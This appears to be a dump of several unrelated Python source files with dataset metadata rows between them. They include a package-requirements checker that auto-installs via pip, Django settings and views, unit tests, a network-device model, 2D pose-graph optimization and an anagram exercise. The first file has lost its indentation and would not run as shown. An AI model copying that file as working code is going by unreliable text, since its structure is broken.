#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python package requirements checker."""
import collections
import importlib
import logging
import subprocess
import sys
from pathlib import Path
from typing import Any, Iterator, TextIO, Tuple, Union
import pkg_resources as pkg
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
PKD_NODE_PREFIX = "peekingduck.pipeline.nodes."
PKD_REQ_TYPE_LEN = 6 # string length of either PYTHON or SYSTEM
PKD_REQ_TYPE_PYTHON = "PYTHON" # type specifier for Python packages
ROOT = Path(__file__).resolve().parents[1]
OptionalRequirement = collections.namedtuple("OptionalRequirement", "name type")
class RequirementChecker(importlib.abc.MetaPathFinder):
"""Checks for optional requirements from imports.
While inheriting from MetaPathFinder is not strictly necessary, it serves
as a reference for the required interface.
"""
n_update = 0
@staticmethod
def find_spec(fullname: str, *_: Any) -> None:
"""Checks if the peekingduck.pipeline.nodes module being imported
contains optional requirements. Attempt to install if it does.
Args:
fullname (:obj:`str`): Name of the module being imported.
"""
if fullname.startswith(PKD_NODE_PREFIX):
try:
RequirementChecker.n_update += check_requirements(
fullname[len(PKD_NODE_PREFIX) :]
)
except subprocess.CalledProcessError:
sys.exit(1)
def check_requirements(
identifier: str, requirements_path: Path = ROOT / "optional_requirements.txt"
) -> int:
"""Checks if the packages specified by the ``identifier`` in the
requirements file at ``requirements_path`` are present on the system. If
``install`` is ``True``, attempts to install the packages.
Args:
identifier (:obj:`str`): A unique identifier, typically a pipeline node
name, used to specify which packages to check for.
requirements_path (Path): Path to the requirements file
Returns:
(:obj:`int`): The number of packages updated.
"""
with open(requirements_path) as infile:
requirements = list(_parse_requirements(infile, identifier))
n_update = 0
for req in requirements:
if req.type == PKD_REQ_TYPE_PYTHON:
try:
pkg.require(req.name)
except (pkg.DistributionNotFound, pkg.VersionConflict):
logger.info(
f"{req.name} not found and is required, attempting auto-update..."
)
try:
logger.info(
subprocess.check_output(["pip", "install", req.name]).decode()
)
n_update += 1
except subprocess.CalledProcessError as exception:
logger.error(exception)
raise
else:
logger.warning(
f"The {identifier} node requires {req.name.strip()} which needs to be "
"manually installed. Please follow the instructions at "
"https://peekingduck.readthedocs.io/en/stable/master.html#api-documentation "
"and rerun. Ignore this warning if the package is already installed"
)
return n_update
def _parse_requirements(file: TextIO, identifier: str) -> Iterator[OptionalRequirement]:
"""Yield ``OptionalRequirement`` objects for each specification in
``strings``.
``strings`` must be a string, or a (possibly-nested) iterable thereof.
Arg:
file (TextIO): The file object containing optional requirements.
identifier (str): A unique identifier, typically a pipeline node name,
used to specify which packages to check for.
Returns:
(Iterator[OptionalRequirement]): Optional requirements, both Python
and system packages, specified under the unique identifier.
"""
lines = iter(_yield_lines(file, identifier))
for line in lines:
# Drop comments -- a hash without a space may be in a URL.
if " #" in line:
line = line[: line.find(" #")]
req_type, req_name = _split_type_and_name(line)
if req_type == PKD_REQ_TYPE_PYTHON:
req = pkg.Requirement(req_name) # type: ignore
requirement = OptionalRequirement(f"{req.name}{req.specifier}", req_type)
else:
requirement = OptionalRequirement(req_name, req_type)
yield requirement
def _yield_lines(strings: Union[TextIO, str], identifier: str) -> Iterator[str]:
"""Yield lines with ``identifier`` as the prefix.
Args:
strings (Union[TextIO, str]): Either a file object or a line from the
file.
identifier (str): A unique identifier, typically a pipeline node name,
used to specify which packages to check for.
Returns:
(Iterator[str]): Lines with ``identifier`` as the prefix.
"""
prefix = f"{identifier} "
if isinstance(strings, str):
for string in strings.splitlines():
string = string.strip()
# Return only optional requirement lines
if string and string.startswith(prefix):
yield string[len(prefix) :]
else:
for string_item in strings:
for string in _yield_lines(string_item, identifier):
yield string
def _split_type_and_name(string: str) -> Tuple[str, str]:
"""Split an optional requirement line into the requirement type and
name.
"""
return string[:PKD_REQ_TYPE_LEN], string[PKD_REQ_TYPE_LEN:]
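# --- Hedged usage sketch (illustration only, not part of this module) -------
# The checker is intended to be registered on ``sys.meta_path`` so that
# importing a ``peekingduck.pipeline.nodes.*`` module triggers the optional
# requirement check; the identifier "model.yolo" below is only an example,
# use the identifiers that appear in optional_requirements.txt.
if __name__ == "__main__":
    sys.meta_path.insert(0, RequirementChecker())
    n_updated = check_requirements("model.yolo")
    logger.info("Optional packages installed or updated: %d", n_updated)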
| 37.113772
| 93
| 0.649564
| 855
| 0.137948
| 2,099
| 0.338658
| 588
| 0.094869
| 0
| 0
| 3,254
| 0.525008
|
49e20e1482e371d2d36af2e6abc0d413c62cd098
| 1,119
|
py
|
Python
|
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | 1
|
2019-05-18T04:34:59.000Z
|
2019-05-18T04:34:59.000Z
|
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | null | null | null |
src/myproject/settings/admin_mail_console_handler.py
|
thinkAmi/DjangoCongress_JP_2019_talk
|
0b746f62808d979c1570de80084686f709996e1d
|
[
"Unlicense"
] | null | null | null |
from .base import *
# 後で確認できるよう、ファイルとして残しておく
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
# filebasedを使う場合は、メールの保存先も指定すること
# '.' の場合、カレントディレクトリに保存される
# EMAIL_FILE_PATH = '.'
EMAIL_FILE_PATH = str(pathlib.Path(BASE_DIR).joinpath('logs'))
ADMINS = [('Admin1', 'admin1@example.com')]
# Send error notification emails to ADMINS even in development mode
DEBUG = True
# Independently of the EMAIL_BACKEND setting, send error notification emails to the console
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'email_backend':
'django.core.mail.backends.console.EmailBackend',
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
},
}
}
| 25.431818
| 66
| 0.570152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 871
| 0.649515
|
49e262c808a1276127a4a16b770e3d39b6997140
| 7,494
|
py
|
Python
|
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
core/tests/machine_request.py
|
xuhang57/atmosphere
|
f53fea2a74ee89ccc8852906799b1d9a7e9178b7
|
[
"BSD-3-Clause"
] | null | null | null |
from dateutil.relativedelta import relativedelta
from uuid import uuid4
import unittest
import pytz
from django.test import TestCase
from django.utils.timezone import datetime
from core.tests.helpers import CoreProviderMachineHelper, CoreMachineRequestHelper, CoreInstanceHelper
from service.machine import process_machine_request
class CoreMachineRequestTestCase(unittest.TestCase):
"""
Add here any specific assertions to a 'MachineRequest' test case
"""
# Super-helpful private methods
def _new_instance_of(self, machine, start_date):
# Create an instance of this machine
instance_helper = CoreInstanceHelper(
"Mock Instance", uuid4(),
start_date, machine=machine)
instance = instance_helper.to_core_instance()
return instance
def _process_new_fork_request(
self,
machine,
new_name,
new_version,
uuid_suffix,
fork_date=None):
if not fork_date:
fork_date = self.start_time
instance = self._new_instance_of(machine, fork_date)
# Create a MachineRequest for newly created Instance
new_app_request_helper = CoreMachineRequestHelper(
new_name, fork_date, new_version, True, instance)
new_app_request = new_app_request_helper.to_core_machine_request()
process_machine_request(new_app_request, 'machine-%s' % uuid_suffix,
update_cloud=False)
new_machine = new_app_request.new_machine
return new_machine
def _process_new_update_request(
self,
machine,
new_name,
new_version,
uuid_suffix,
update_date=None):
if not update_date:
update_date = self.start_time
instance = self._new_instance_of(machine, update_date)
update_request_helper = CoreMachineRequestHelper(
new_name, update_date, new_version, False, instance)
core_request = update_request_helper.to_core_machine_request()
process_machine_request(core_request, 'machine-%s' % uuid_suffix,
update_cloud=False)
new_machine = core_request.new_machine
return new_machine
# Custom assertions
def assertMachineVersionEquals(self, machine, version_test):
self.assertEqual(machine.version, version_test)
def assertApplicationNameEquals(self, machine, name_test):
self.assertEqual(machine.application.name, name_test)
class TestVersionAndForking(CoreMachineRequestTestCase):
def setUp(self):
self.start_time = datetime(2015, 1, 1, tzinfo=pytz.utc)
provider_machine_helper = CoreProviderMachineHelper(
'First machine', 'machine-1', 'openstack', self.start_time)
self.machine_1 = provider_machine_helper.to_core_machine()
self.instance_helper = CoreInstanceHelper(
"test_instance", "1234-1234-1234-1234",
self.start_time, machine=self.machine_1)
self.instance_1 = self.instance_helper.to_core_instance()
pass
def test_single_version_updating(self):
"""
This test is meant to represent which rules will succeed/fail as
'acceptable' versions. Currently, all version strings are acceptable.
As these rules change, the tests will change/grow.
"""
provider_machine_helper = CoreProviderMachineHelper(
'Test Versioning',
'machine-version-1',
'openstack',
self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_1.update_version('1')
self.assertMachineVersionEquals(machine_1, '1')
machine_1.update_version('1.2.1')
self.assertMachineVersionEquals(machine_1, '1.2.1')
machine_1.update_version('one-two-two')
self.assertMachineVersionEquals(machine_1, 'one-two-two')
machine_1.update_version('man-bear-pig')
self.assertMachineVersionEquals(machine_1, 'man-bear-pig')
pass
def test_update_then_fork(self):
provider_machine_helper = CoreProviderMachineHelper(
'New Machine', 'new-machine-1', 'openstack', self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_2 = self._process_new_update_request(
machine_1,
"New Name, Same Version",
"2.0",
2)
self.assertApplicationNameEquals(machine_2, "New Name, Same Version")
self.assertMachineVersionEquals(machine_2, "2.0")
machine_3 = self._process_new_fork_request(
machine_2,
"Totally different",
"1.0",
3)
self.assertApplicationNameEquals(machine_3, "Totally different")
self.assertMachineVersionEquals(machine_3, "1.0")
pass
def test_complex_fork_tree(self):
# Boot strap the first machine
provider_machine_helper = CoreProviderMachineHelper(
'Complex Fork Test-New Machine',
'new-machine-1234', 'openstack', self.start_time)
machine_1 = provider_machine_helper.to_core_machine()
machine_2 = self._process_new_update_request(
machine_1, machine_1.application.name, "2.0", 2)
self.assertApplicationNameEquals(machine_2, machine_1.application.name)
self.assertMachineVersionEquals(machine_2, "2.0")
machine_3 = self._process_new_update_request(
machine_1, machine_1.application.name, "3.0", 3)
self.assertApplicationNameEquals(machine_3, machine_1.application.name)
self.assertMachineVersionEquals(machine_3, "3.0")
machine_4 = self._process_new_update_request(
machine_1, machine_1.application.name, "4.0", 4)
self.assertApplicationNameEquals(machine_4, machine_1.application.name)
self.assertMachineVersionEquals(machine_4, "4.0")
self.assertApplicationNameEquals(machine_1, machine_4.application.name)
fork_level_2 = self._process_new_fork_request(
machine_2, "I am not machine 2", "1.0.0", 5)
self.assertNotEqual(fork_level_2.application.name,
machine_2.application.name)
update_fork_2 = self._process_new_update_request(
fork_level_2, "not machine 2, but an update", "2.0.0", 6)
self.assertApplicationNameEquals(
fork_level_2,
"not machine 2, but an update")
self.assertApplicationNameEquals(
update_fork_2,
"not machine 2, but an update")
self.assertMachineVersionEquals(fork_level_2, "1.0.0")
self.assertMachineVersionEquals(update_fork_2, "2.0.0")
fork_level_3 = self._process_new_fork_request(
machine_3, "I am different from machine 3", "3.0.5", 7)
self.assertNotEqual(fork_level_3.application.name,
machine_3.application.name)
update_fork_3 = self._process_new_update_request(
fork_level_3, fork_level_3.application.name, "3.0.6", 8)
self.assertApplicationNameEquals(
fork_level_3,
"I am different from machine 3")
self.assertApplicationNameEquals(
update_fork_3,
"I am different from machine 3")
self.assertMachineVersionEquals(fork_level_3, "3.0.5")
self.assertMachineVersionEquals(update_fork_3, "3.0.6")
pass
| 40.508108
| 102
| 0.665999
| 7,153
| 0.954497
| 0
| 0
| 0
| 0
| 0
| 0
| 1,197
| 0.159728
|
49e3a9de96ed6a59b374bbb066c35f87db59257f
| 3,455
|
py
|
Python
|
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/remote/models/device_zone_remote.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class DeviceZoneRemote(RemoteModel):
"""
Zones defined on a traffic filtering device. On devices that do not natively support zones (e.g., Cisco routers), there is one zone per interface, plus an additional 'internal' zone.
| ``DeviceZoneID:`` The internal NetMRI identifier for this filtering zone.
| ``attribute type:`` number
| ``DeviceID:`` The internal NetMRI identifier for the device to which this zone belongs.
| ``attribute type:`` number
| ``DataSourceID:`` The internal NetMRI identifier for the collector NetMRI that collected this data record.
| ``attribute type:`` number
| ``ZoneFirstSeenTime:`` The timestamp of when NetMRI first discovered this service.
| ``attribute type:`` datetime
| ``ZoneStartTime:`` The starting effective time of this record.
| ``attribute type:`` datetime
| ``ZoneEndTime:`` The ending effective time of this record, or empty if still in effect.
| ``attribute type:`` datetime
| ``ZoneTimestamp:`` The date and time this record was collected or calculated.
| ``attribute type:`` datetime
| ``ZoneChangedCols:`` The fields that changed between this revision of the record and the previous revision.
| ``attribute type:`` string
| ``ZoneName:`` The name of the zone.
| ``attribute type:`` string
| ``ZoneProvisionData:`` Internal data - do not modify, may change without warning.
| ``attribute type:`` string
| ``ZoneInterfaceCount:`` The total number of interfaces connected to this zone.
| ``attribute type:`` number
| ``ZoneInterfaceID:`` The internal NetMRI identifier of that interface, if only one interface connected to this zone.
| ``attribute type:`` number
| ``ZoneArtificialInd:`` A flag indicating that this zone has no counterpart in the device configuration.
| ``attribute type:`` bool
"""
properties = ("DeviceZoneID",
"DeviceID",
"DataSourceID",
"ZoneFirstSeenTime",
"ZoneStartTime",
"ZoneEndTime",
"ZoneTimestamp",
"ZoneChangedCols",
"ZoneName",
"ZoneProvisionData",
"ZoneInterfaceCount",
"ZoneInterfaceID",
"ZoneArtificialInd",
)
@property
@check_api_availability
def data_source(self):
"""
The collector NetMRI that collected this data record.
``attribute type:`` model
"""
return self.broker.data_source(**{"DeviceZoneID": self.DeviceZoneID })
@property
@check_api_availability
def zone_interface(self):
"""
The Interface linked to this zone (if only one interface linked to this zone)
``attribute type:`` model
"""
return self.broker.zone_interface(**{"DeviceZoneID": self.DeviceZoneID })
@property
@check_api_availability
def device(self):
"""
The device from which this data was collected.
``attribute type:`` model
"""
return self.broker.device(**{"DeviceZoneID": self.DeviceZoneID })
| 31.697248
| 186
| 0.600868
| 3,347
| 0.968741
| 0
| 0
| 802
| 0.232127
| 0
| 0
| 2,524
| 0.730535
|
49e3eb2356e1b76dcdb5820a9f4030de1c698ff6
| 1,510
|
py
|
Python
|
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | null | null | null |
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | 5
|
2020-07-19T10:28:57.000Z
|
2021-08-19T18:25:28.000Z
|
nitmis_admin/controllers/register.py
|
kalesh13/nitmis
|
b8c73f74411bbad441557c6553cbbd35acc5a5ee
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from django.shortcuts import render
from django.http.response import JsonResponse
from nitmis_admin.serializers.UserSerializer import UserSerializer
def create_user(role="Guest"):
"""
"""
def fun_wrapper(func):
def wrapper(*args, **kwargs):
serializer = UserSerializer(data=args[1].data)
#
# If the data is valid, create a new user
# and return the access token details.
if serializer.is_valid():
serializer.save(role=role)
return JsonResponse(serializer.data)
return JsonResponse({"errors": serializer.errors}, status=422)
return wrapper
return fun_wrapper
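# Illustration (explanatory comment only): decorating a view method with
# @create_user(role="Administrator") is equivalent to
#     post = create_user(role="Administrator")(post)
# i.e. the wrapper performs validation and user creation itself, which is
# why the decorated methods below can have empty bodies.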
class Register(APIView):
'''
Parent register controller. Post requests create
a general Guest account
'''
def get(self, request):
'''
Renders the base layout on GET request. Frontend
handles the rendering of forms
'''
return render(request, 'base.html')
@create_user()
def post(self, request):
'''
Registers a new user and assigns the user
a Guest role.
'''
class AdminRegister(Register):
'''
Register controller for administrators.
'''
@create_user(role="Administrator")
def post(self, request):
'''
Overriden post function. Registers the user as
an administrator
'''
| 26.491228
| 74
| 0.625828
| 722
| 0.478146
| 0
| 0
| 306
| 0.202649
| 0
| 0
| 572
| 0.378808
|
49e46e9b59b725cb283f9125430ec7a34bd75825
| 9,521
|
py
|
Python
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
karanchawla/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 65
|
2017-03-03T07:30:28.000Z
|
2021-08-19T01:12:47.000Z
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
karanchawla/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 4
|
2017-03-02T13:51:40.000Z
|
2017-11-01T16:49:22.000Z
|
3_0_pgo_icp/solution/pose_graph_optimization/assignment_I_2/pgo_2D.py
|
ethz-asl/ai_for_robotics
|
03bb66bae99bac3acd79bc1ec6d3b9c0eeabcdf8
|
[
"BSD-3-Clause"
] | 43
|
2017-03-02T11:31:21.000Z
|
2020-10-30T07:10:59.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 2 10:00 2017
@author: Timo Hinzmann (hitimo@ethz.ch)
"""
import math
from math import floor, ceil
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import linalg as sla
from scipy import array, linalg, dot
from enum import Enum
import copy
import pylab
# References:
# [1] Grisetti, Kuemmerle, Stachniss et al. "A Tutorial on Graph-Based SLAM"
# Pose-graph optimization closely following Algorithm 1, 2D from [1].
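# Reading aid (summary of the Gauss-Newton step implemented below, stated
# here only for orientation): for every constraint (i, j) the residual e_ij
# and the Jacobian blocks A_ij = d e_ij / d x_i, B_ij = d e_ij / d x_j are
# accumulated into
#     H += J^T * Omega_ij * J      and      b += J^T * Omega_ij * e_ij,
# and each iteration solves  H * delta_x = -b  followed by  x += delta_x.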
class PoseGraphOptimization2D():
def __init__(self, vertices, constraints):
self.vertices = vertices
self.constraints = constraints
# State x := [x,y,theta].
self.x = self.vertices[:, 1:]
self.index_x = 0
self.index_y = 1
self.index_theta = 2
# Dimensions.
self.num_nodes = self.vertices.shape[0]
self.dimensions = 3
self.num_states = self.dimensions * self.num_nodes
# Residual of the constraint [dim.: 3x1]
def e_ij(self, R_ij, R_i, t_i, t_j, t_ij, theta_i, theta_j, theta_ij):
# Equation (30).
e_ij = np.zeros([3, 1])
# 2x1 block
e_ij[0:2, 0] = np.dot(R_ij.T, np.dot(R_i.T,(t_j - t_i)) - t_ij).reshape(2)
e_ij[2, 0] = theta_j - theta_i - theta_ij
return e_ij
# 2D rotation matrix [dim.: 2x2]
def R_i(self, theta_i):
# Equation (31).
R_i = np.zeros([2, 2])
R_i[0, 0] = np.cos(theta_i)
R_i[0, 1] = -np.sin(theta_i)
R_i[1, 0] = np.sin(theta_i)
R_i[1, 1] = np.cos(theta_i)
return R_i
# Derivate of 2D rotation matrix wrt. theta [dim.: 2x2]
def dR_i(self, theta_i):
# Required for equation (32).
dR_i = np.zeros([2, 2])
dR_i[0, 0] = -np.sin(theta_i)
dR_i[0, 1] = -np.cos(theta_i)
dR_i[1, 0] = np.cos(theta_i)
dR_i[1, 1] = -np.sin(theta_i)
return dR_i
# Derivative of error function wrt. x_i [dim.: 3x3]
def A_ij(self, R_ij, R_i, dR_i, t_j, t_i):
# Equation (32).
# The dimension of A_ij is [num_states x num_states]
A_ij = np.zeros([3, 3])
# 2x2 block
A_ij[0:2, 0:2] = -np.dot(R_ij.T, R_i.T)
# 2x1 block
A_ij[0:2, 2] = np.dot(np.dot(R_ij.T, dR_i.T), (t_j-t_i)).reshape(2)
A_ij[2, 2] = -1.0
return A_ij
# Derivative of error function wrt. x_j [dim.: 3x3]
def B_ij(self, R_ij, R_i):
# Equation (33).
# The dimension of B_ij is [num_states x num_states]
B_ij = np.zeros([3, 3])
# 2x2 block
B_ij[0:2, 0:2] = np.dot(R_ij.T, R_i.T)
B_ij[2, 2] = 1.0
return B_ij
# Normalize angles to [-pi,pi).
def normalizeAngles(self, theta):
# Iterate through the nodes and normalize the angles.
for i in range(0, self.num_nodes):
while theta[i] < -math.pi:
theta[i] += 2 * math.pi
while theta[i] >= math.pi:
theta[i] -= 2 * math.pi
return theta
def optimizePoseGraph(self):
# Maximum number of optimization iterations to avoid getting stuck
# in infinite while loop.
max_number_optimization_iterations = 1000
optimization_iteration_counter = 0
optimization_error = np.inf
tolerance = 1.0e-11
t_i = np.zeros([2, 1])
t_j = np.zeros([2, 1])
t_ij = np.zeros([2, 1])
Omega_ij = np.zeros([3, 3])
# Make sure we achieve the desired accuracy.
while optimization_error > tolerance:
# num_states = 3 * num_nodes (since x,y,theta)
H = np.zeros([self.num_states, self.num_states])
b = np.zeros([self.num_states, 1])
# Iterate over all constraints.
for constraint in self.constraints:
# Node i.
i = int(constraint[0])
# Node j.
j = int(constraint[1])
# Relative translation from node i to node j,
t_ij[self.index_x] = constraint[2]
t_ij[self.index_y] = constraint[3]
# Relative rotation from node i to node j.
theta_ij = constraint[4]
# *Global* position of node i (initial guess).
t_i[self.index_x] = self.x[i, self.index_x]
t_i[self.index_y] = self.x[i, self.index_y]
# *Global* position of node j (initial guess).
t_j[self.index_x] = self.x[j, self.index_x]
t_j[self.index_y] = self.x[j, self.index_y]
# *Global* orientation of node i (initial guess).
theta_i = self.x[i, self.index_theta]
# *Global* orientation of node j (initial guess).
theta_j = self.x[j, self.index_theta]
# Information matrix Omega.
# First row.
Omega_ij[0, 0] = constraint[5]
Omega_ij[0, 1] = constraint[6]
Omega_ij[0, 2] = constraint[7]
# Second row.
Omega_ij[1, 0] = constraint[6]
Omega_ij[1, 1] = constraint[8]
Omega_ij[1, 2] = constraint[9]
# Third row.
Omega_ij[2, 0] = constraint[7]
Omega_ij[2, 1] = constraint[9]
Omega_ij[2, 2] = constraint[10]
# Compute R_ij, the *local* rotation matrix from node i to node j.
R_ij = self.R_i(theta_ij)
# Compute R_i, the *global* orientation of node i.
R_i = self.R_i(theta_i)
# Compute R_j, the *global* orientation of node j.
R_j = self.R_i(theta_j)
# Compute dR_i, the derivate of R_i wrt. theta_i.
dR_i = self.dR_i(theta_i)
# Compute the derivative of the error function wrt. x_i.
A_ij = self.A_ij(R_ij, R_i, dR_i, t_j, t_i)
# Compute the derivate of the error function wrt. x_j.
B_ij = self.B_ij(R_ij, R_i)
# Compute the residual of the constraint connecting node i and node j
e_ij = self.e_ij(R_ij, R_i, t_i, t_j, t_ij, theta_i, theta_j, theta_ij)
# Make sure to get the indices right...
# i=0: b[0:3]; i=1: b[3:6]; ...
# j=1: b[3:6]; i=2: b[6:9]; ...
i_r = 3*i
i_c = 3*i+3
j_r = 3*j
j_c = 3*j+3
# Compute the coefficient vector.
# b_i
b[i_r:i_c] += np.dot(A_ij.T, np.dot(Omega_ij, e_ij)).reshape(3, 1)
# b_j
b[j_r:j_c] += np.dot(B_ij.T, np.dot(Omega_ij, e_ij)).reshape(3, 1)
# Compute the contribution of this constraint to the linear system.
# H_ii
H[i_r:i_c,i_r:i_c] += np.dot(A_ij.T, np.dot(Omega_ij, A_ij))
# H_ij
H[i_r:i_c,j_r:j_c] += np.dot(A_ij.T, np.dot(Omega_ij, B_ij))
# H_ji
H[j_r:j_c,i_r:i_c] += np.dot(B_ij.T, np.dot(Omega_ij, A_ij))
# H_jj
H[j_r:j_c,j_r:j_c] += np.dot(B_ij.T, np.dot(Omega_ij, B_ij))
# Keep the first node fixed.
H[0:3, 0:3] += np.eye(3, 3)
# Solve the linear system.
delta_x = sla.spsolve(H, -b)
delta_x = delta_x.reshape(self.num_nodes, self.dimensions)
# Equation (34): Update the states by applying the increments.
self.x += delta_x
# Save the current optimization error.
optimization_error = np.linalg.norm(delta_x, 2)
# Maximum number of optimization iterations to avoid getting stuck
# in infinite while loop.
optimization_iteration_counter += 1
if optimization_iteration_counter > max_number_optimization_iterations:
print "WARNING! Reached max. number of iterations before converging to desired tolerance!"
break
print "Optimization iter.: ", optimization_iteration_counter, " optimization error: ", optimization_error
# The angles are normalized to [-pi,pi) *after* applying the increments.
self.x[:, self.index_theta] = self.normalizeAngles(self.x[:, self.index_theta])
return self.x
def main():
# Relative path to data from exercise sheet.
base = "../../../pose_graph_optimization/assignment_I_2/"
# Load the input data.
vertices = np.genfromtxt(open(base + "vertices.dat"))
edges = np.genfromtxt(open(base + "edges.dat"))
lc = np.genfromtxt(open(base + "loop_closures.dat"))
# Edges and loop-closures are constraints that can be handled the same
# way in the pose graph optimization backend as remarked in the exercise sheet.
all_constraints = []
all_constraints = np.append(edges, lc, axis = 0)
# Plot the initial values.
pylab.plot(vertices[:, 1], vertices[:, 2], 'b')
plt.pause(1)
# Perform the 2D pose graph optimization according to [1], Algorithm 1, 2D
pgo = PoseGraphOptimization2D(vertices, all_constraints)
x_opt = pgo.optimizePoseGraph()
# Save the optimized states in rows: [x_0, y_0, th_0; x_1, y_1, th_1; ...]
np.savetxt('results_2D.txt', np.transpose(x_opt))
# Plot the optimized values.
pylab.plot(x_opt[:,0], x_opt[:,1], 'g')
plt.pause(5)
if __name__ == "__main__":
main()
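# A minimal vectorized alternative (a sketch, not part of the original script): the
# element-wise while-loops in normalizeAngles can be replaced by a single modular
# wrap of the whole angle array into [-pi, pi) using numpy.
import numpy as np
def normalize_angles_vectorized(theta):
    # (theta + pi) mod 2*pi lies in [0, 2*pi); shifting back by pi gives [-pi, pi).
    return (np.asarray(theta) + np.pi) % (2.0 * np.pi) - np.pi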
| 36.619231
| 119
| 0.553513
| 7,911
| 0.8309
| 0
| 0
| 0
| 0
| 0
| 0
| 3,065
| 0.32192
|
49e502e61c40a6d5ce473d9fc363be1b2927b0ab
| 1,019
|
py
|
Python
|
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | null | null | null |
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | 1
|
2018-01-09T20:51:34.000Z
|
2018-01-09T20:51:34.000Z
|
simple_history/management/commands/_populate_utils.py
|
SummitESP/django-simple-history
|
78c929159263dd583bd4d8d5a28a274a9ad6be0b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.utils.timezone import now
class NotHistorical(TypeError):
"""No related history model found."""
def get_history_model_for_model(model):
"""Find the history model for a given app model."""
try:
manager_name = model._meta.simple_history_manager_attribute
except AttributeError:
raise NotHistorical("Cannot find a historical model for "
"{model}.".format(model=model))
return getattr(model, manager_name).model
def bulk_history_create(model, history_model):
"""Save a copy of all instances to the historical model."""
historical_instances = [
history_model(
history_date=getattr(instance, '_history_date', now()),
history_user=getattr(instance, '_history_user', None),
**dict((field.attname, getattr(instance, field.attname))
for field in instance._meta.fields)
) for instance in model.objects.all()]
history_model.objects.bulk_create(historical_instances)
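# Hedged usage sketch (the Poll model named in the comment is an assumption, not part
# of this module): populate the historical table for an existing model in one pass by
# combining the two helpers defined above.
def populate_history_for(model):
    # Resolve the auto-generated historical model, then copy every current row.
    history_model = get_history_model_for_model(model)
    bulk_history_create(model, history_model)
# e.g. populate_history_for(Poll) for a hypothetical Poll model with history enabled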
| 36.392857
| 68
| 0.677134
| 73
| 0.071639
| 0
| 0
| 0
| 0
| 0
| 0
| 224
| 0.219823
|
49e6d32460dd6b58678d99ca2b2edccf4f319501
| 1,174
|
py
|
Python
|
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
anagrams.py
|
zubrik13/coding_intrv_prer
|
853a7c8357ad43601313daadcc1c494d403a9aa0
|
[
"MIT"
] | null | null | null |
"""
A student is taking a cryptography class and has found anagrams to be very useful.
Two strings are anagrams of each other if the first string's letters can be
rearranged to form the second string. In other words, both strings must
contain the same exact letters in the same exact frequency. For example,
bacdc and dcbac are anagrams, but bacdc and dcbad are not.
The student decides on an encryption scheme that involves two large strings.
The encryption is dependent on the minimum number of character deletions
required to make the two strings anagrams. Determine this number.
Given two strings, a and b, that may or may not be of the same length,
determine the minimum number of character deletions required to make
a and b anagrams. Any characters can be deleted from either of the strings.
"""
a = 'ceed'
b = 'acbeef'
total_len = len(a) + len(b)
match_counter = 0
c = list(a)
d = list(b)
if len(a) <= len(b):
for i in c:
if i in d:
match_counter += 2
d.remove(i)
else:
for i in d:
if i in c:
match_counter += 2
c.remove(i)
min_num = total_len - match_counter
print(min_num)
